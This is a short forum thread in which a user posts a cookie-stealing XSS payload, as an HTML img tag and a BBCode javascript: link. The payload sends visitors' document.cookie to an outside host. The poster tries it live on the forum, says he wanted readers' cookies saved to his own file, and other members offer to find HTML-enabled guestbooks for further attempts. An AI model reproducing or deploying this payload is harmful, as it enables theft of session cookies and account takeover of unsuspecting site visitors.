Testing an exploit...

[DevilHack]

HTML SITES:
<img src="javascript:void(window.location('http://DevilHack.t35.com/script.php?&HTTP_REFERER='+document.cookie))">

BBCODE:

javascript:void(window.location('http://DevilHack.t35.com/script.php?&HTTP_REFERER='+document.cookie))

 

[Lord Kalthorn]

Why are you trying to put Images on here without proper image links?

 

[DevilHack]

No, if it would have worked then I would have had your cookies reported into a .txt file of mine...

 

[Lord Kalthorn]

Oh! Well lets pray to god for your innocent sake that you do not recieve them! It would not be very pleasant for you at all! Lord kalthorn has a dark side!

Ha! Ha! Ha! Ha! Ha! Moooo - I am a Cow!

 

[DevilHack]

It didn't work, the image didn't show up. I need to find a good guestbook/forum to do it on. Know any?

 

[David Lindon]

Very interesting!
There are a few guestbooks around that allow HTML. Just have to find one now!

 

[Lord Kalthorn]

Yeah - I can't think of any off the top of my head. I'll have to have a looksee

 

[DevilHack]

Thanks for helping :-D

 

[Lord Kalthorn]

I haven't found any yet; but I shall keep on until I have!

 

[DevilHack]

They're hard to find...